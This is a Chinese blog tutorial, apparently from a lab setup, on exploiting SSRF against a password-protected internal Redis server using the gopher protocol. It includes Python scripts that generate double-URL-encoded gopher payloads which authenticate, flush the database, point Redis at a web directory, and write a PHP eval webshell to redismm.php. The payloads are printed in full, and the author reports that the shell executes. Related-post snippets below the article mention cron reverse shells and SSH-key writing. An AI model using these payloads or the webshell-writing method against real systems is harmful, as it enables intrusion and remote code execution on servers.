SSRF+Redis内网渗透二

于 2025-03-15 20:42:31 发布
阅读量889 收藏 8
点赞数 12
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zj2084/article/details/146280394
版权

首先我们给Redis设置密码,模拟更加真实的场景

然后启动Redis服务

 我们先将bind 127.0.0.1 -::1给注释掉,因为我们要通过Python进行连接

 我们进去看看Redis服务器里面有啥key值,我们发现有四个,我们使用flushdb进行删除,确保里面没有key值

 使用Python进行连接并发送数据

import socket

s = socket.socket()  #建立一个socket对象
s.connect(('192.168.112.188',6379))  #连接

data = "*3\r\n$3\r\nset\r\n$8\r\nusername\r\nqiang\r\n"
s.send(data.encode())

resp = s.recv(1024)
print(resp.decode())

s.close()

告诉我们要输入密码

所以我们继续添加命令auth admin123即可

import socket

s = socket.socket()  #建立一个socket对象
s.connect(('192.168.112.188',6379))  #连接

data = "*2\r\n$4auth\r\n$8\r\nadmin123\r\n*3\r\n$3\r\nset\r\n$8\r\nusername\r\nqiang\r\n"
s.send(data.encode())

resp = s.recv(1024)
print(resp.decode())

s.close()

登录成功,set也成功

 然后我们在Redis里查看,发现已经有key值啦,就是我们所在Python代码里添加的数据

 当然这些操作我们也可以在Python代码中实现

import socket

s = socket.socket()  #建立一个socket对象
s.connect(('192.168.112.188',6379))  #连接

data = "*2\r\n$4auth\r\n$8\r\nadmin123\r\n*3\r\n$3\r\nset\r\n$8\r\nusername\r\nqiang\r\n"
s.send(data.encode())

resp = s.recv(1024)
print(resp.decode())

data = '*2\r\n$3\r\nget\r\n$8\r\nusername\r\n'
s.send(data.encode())
resp = s.recv(1024)
print(resp.decode())

s.close()

 同样也可以给我们显示内容

gopher干的事情就是将那个数据包给构造出来,就是Python代码中的那个data的值,而且gopher也支持SSRF,这样我们就可以进内网进行操作啦

接下来我们将bing 127.0.0.1 -::1的注释给拿掉,只允许内网进行访问,然后Python代码也不好使啦,根本连不上,直接就是拒绝连接

利用Python实现Gopher的Payload

1、思路

gopher协议在ssrf的利用中一般用来攻击redis、mysql、fastcgi、smtp等服务。需要满足Gopher的协议要求,其数据格式为:gopher://ip:port/_TCP/IP数据流,比如针对Redis的操作,协议需要gopher://127.0.0.1:6379/_开头,后面跟上基于TCP协议的原始数据包。并且针对换行符,url编码使用%0d%0a替换字符串中的回车换行,这样构成的Redis协议的Payload才能正确地被Gopher处理。在这一点上,Dict协议相对方便一些,但是两者有很大差别,比如dict只支持Redis的单条命令,而Gopher可以很好地支持批量命令处理,在针对需要密码登录Redis的情况下,dict也无能为力而Gopher可以很好地完成。

2、实验代码

简单实现:

import urllib.parse

command = "*2\r\n$4auth\r\n$8\r\nadmin123\r\n*3\r\n$3\r\nset\r\n$8\r\nusername\r\nqiang\r\n"
payload = urllib.parse.quote(command)
print(payload.replace('%',"%25"))

该代码这样写的目的是为了让其生成的paylaod满足Gopher的要求,生成的payload为:

%252A2%250D%250A%25244auth%250D%250A%25248%250D%250Aadmin123%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25248%250D%250Ausername%250D%250Aqiang%250D%250A

将其进行执行,放到_后面去

 然后我们发现在Redis里面有username

接着我们可以看看可不可以执行get命令 ,就是直接在Python里面写入get指令,通过hackbar进行发送,看看网页上会不会给我们显示内容

import urllib.parse

#command = "*2\r\n$4auth\r\n$8\r\nadmin123\r\n*3\r\n$3\r\nset\r\n$8\r\nusername\r\nqiang\r\n"
command = "*2\r\n$3\r\nget\r\n$8\r\nusername\r\n"
payload = urllib.parse.quote(command)
print(payload.replace('%',"%25"))

发现不会显示,其实get不重要啦,只要set可行就是可以的

灵活操作:

接下来我们需要做的事情就是将command里面的命令变成config、set、save之类的,就是和写入一句话木马做的一些操作是一样的

cmdlist = ['auth admin123','flushdb','config set dir /opt/lampp/htdocs/security','config set dbfilename redismm.php','set myshell <?=eval($_POST[a]);?>','save']

payload = ""
for command in cmdlist:
    wordlist = command.split(" ")
    print(wordlist)
    payload = payload + "*" + str(len(wordlist)) + r"\r\n"
    for word in wordlist:
        payload += "$" +str(len(word)) + word + r"\r\n"

print(payload)
payload = urllib.parse.quote(payload)
print(payload.replace('%',"%25"))
*2\r\n$4auth\r\n$8admin123\r\n*1\r\n$7flushdb\r\n*4\r\n$6config\r\n$3set\r\n$3dir\r\n$26/opt/lampp/htdocs/security\r\n*4\r\n$6config\r\n$3set\r\n$10dbfilename\r\n$11redismm.php\r\n*3\r\n$3set\r\n$7myshell\r\n$21<?=eval($_POST[a]);?>\r\n*1\r\n$4save\r\n
%252A2%255Cr%255Cn%25244auth%255Cr%255Cn%25248admin123%255Cr%255Cn%252A1%255Cr%255Cn%25247flushdb%255Cr%255Cn%252A4%255Cr%255Cn%25246config%255Cr%255Cn%25243set%255Cr%255Cn%25243dir%255Cr%255Cn%252426/opt/lampp/htdocs/security%255Cr%255Cn%252A4%255Cr%255Cn%25246config%255Cr%255Cn%25243set%255Cr%255Cn%252410dbfilename%255Cr%255Cn%252411redismm.php%255Cr%255Cn%252A3%255Cr%255Cn%25243set%255Cr%255Cn%25247myshell%255Cr%255Cn%252421%253C%253F%253Deval%2528%2524_POST%255Ba%255D%2529%253B%253F%253E%255Cr%255Cn%252A1%255Cr%255Cn%25244save%255Cr%255Cn

生成的结果如上图所示,第一个生成的Payload经过检验是没有任何问题的,但是经过URL编码的Payload出现了问题,它是将\r和\n转换成了5Cr和5Cn,系统编码的问题我们无法去改变,但我们可以使用Python代码进行一个替换,最终正确的Python代码为:

import urllib.parse

cmdlist = ['auth admin123','flushdb','config set dir /opt/lampp/htdocs/security','config set dbfilename redismm.php','set myshell <?=eval($_POST[a]);?>','save']

payload = ""
for command in cmdlist:
    wordlist = command.split(" ")
    print(wordlist)
    payload = payload + "*" + str(len(wordlist)) + r"\r\n"
    for word in wordlist:
        payload += "$" +str(len(word)) + word + r"\r\n"

print(payload)
payload = urllib.parse.quote(payload)
payload = payload.replace("%","%25").replace("5Cr","0D").replace("5Cn","0A")
print(payload)

生成的正确的Payload如下:

*2\r\n$4auth\r\n$8admin123\r\n*1\r\n$7flushdb\r\n*4\r\n$6config\r\n$3set\r\n$3dir\r\n$26/opt/lampp/htdocs/security\r\n*4\r\n$6config\r\n$3set\r\n$10dbfilename\r\n$11redismm.php\r\n*3\r\n$3set\r\n$7myshell\r\n$21<?=eval($_POST[a]);?>\r\n*1\r\n$4save\r\n
%252A2%250D%250A%25244auth%250D%250A%25248admin123%250D%250A%252A1%250D%250A%25247flushdb%250D%250A%252A4%250D%250A%25246config%250D%250A%25243set%250D%250A%25243dir%250D%250A%252426/opt/lampp/htdocs/security%250D%250A%252A4%250D%250A%25246config%250D%250A%25243set%250D%250A%252410dbfilename%250D%250A%252411redismm.php%250D%250A%252A3%250D%250A%25243set%250D%250A%25247myshell%250D%250A%252421%253C%253F%253Deval%2528%2524_POST%255Ba%255D%2529%253B%253F%253E%250D%250A%252A1%250D%250A%25244save%250D%250A

然后查看文件系统,发现已经成功写入,并且写入的PHP代码是能够被执行的

那我们就执行一下这个PHP代码,直接输入其所在的文件名即可,发现执行成功,没有任何问题

 当然我们还有另外一种方式进行编辑

\r\n使用正则表达式进行替换

 替换后的结果如下所示,然后将前面的\r\n给删除即可

然后将*替换成%252A

然后将\r替换成%250D

 然后将\n替换成%250A

然后将$替换为%2524,然后我们构造的Pyload已经成功了

ssrf+redis
qq_45213259的博客
11-30 3959
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1406
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1683
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2659
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
SSRFRedis的利用
zkaqlaoniao的博客
12-25 608
Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
SSRF+redis未授权漏洞复现
2302_80859314的博客
08-24 507
SSRF(Server-Side Request Forgery)即服务器端请求伪造,是一种由攻击者构造攻击链传给服务器,服务器执行并发起请求造成安全问题的漏洞,一般用来在外网探测或攻击内网服务。当网站需要调用指定URL地址的资源,但是没有对这个URL做好过滤,就会导致可以访问任意地址。
SSRFRedis进行内网渗透
zhuge_long的专栏
12-07 894
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
深入解析SSRFRedis未授权访问
m0_66993332的博客
08-24 1210
etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件SSRFRedis未授权访问是两类常见但极具威胁的安全漏洞。
基于SSRF+Redis内网渗透
weixin_46686336的博客
11-07 824
基于SSRF+Redis内网渗透
浅析RedisSSRF的利用
qq_45521281的博客
06-03 992
文章目录SSRF介绍RESP协议Redis配合gopher协议进行SSRF概述利用条件利用绝对路径写webshell构造payload写ssh公钥构造payload利用contrab计划任务反弹shell构造payload SSRF介绍 SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redisSSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。 文章中的数据包构造会涉及到re
Redis未授权访问及配合SSRF总结
saber的博客
10-24 1394
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
Redis渗透&SSRF的利用-看这一篇就够了
永远都没有了
02-05 2056
关于redis渗透利用,及SSRF的方式
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3619
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
SSRF+Redis内网渗透
最新发布
zj2084的博客
03-15 620
因为上面的环境我们将密码给注释掉了,所以不会被密码所限制,如果有密码的话,我们只能够登录上去,如果还想继续做Redis的操作,就已经不顶事了,因为这是一个死循环,无论如何只能执行auth:admin123,而不能进行接下来的操作,这样的话,dict这种协议就没有办法啦,dict还可以登录记录那条有效的,我们可以用来爆破登录的密码。由于上面我们将密码给注释了,所以我们现在将密码的注释给删除,然后我们使用bp进行爆破密码,爆破成功,发现密码是admin123。
RedisSSRF中的应用
feng的博客
10-06 2936
偶然找到的一篇文章,觉得写的很不错。本来只是收藏而不是转载,但是我发现这篇文章的原文已经挂了,因此就转载了过来。
ssrf+redis未授权靶场
actistsec的博客
10-25 2216
自己搭建不太合理的ssrf联动redis未授权
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 5241
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录中写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端
ssrf redis内网渗透
07-21
SSRF (Server-Side Request Forgery) 是一种网络安全漏洞,发生在服务器处理请求时,由于设计不当或错误配置,使得服务器能够响应来自非预期来源的请求,这可能导致未经授权的内部网络访问,包括通过Redis服务。 Redis内网渗透是指攻击者利用SSRF漏洞,将外部网站或应用程序伪装成合法客户端向Redis服务器发送请求,从而获取、修改或控制服务器内的数据,进而访问到服务器所在的私有网络资源。这种情况下,攻击链可能会包括: 1. 发现并利用SSRF漏洞:首先,攻击者需要找到目标系统中存在的能引发SSRF的函数或API。 2. 构造恶意请求:构造特定的URL或HTTP请求,使其看起来像是正常的服务请求,但实际上指向的是Redis服务。 3. 内网穿透:通过Redis服务,攻击者可以读取敏感信息(如数据库记录、文件内容),甚至可能触发远程命令执行,进一步扩大权限范围。 4. 数据泄露或操作:利用获取的权限,攻击者可以暴露内部系统的敏感数据,或者对关键系统进行破坏或操纵。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值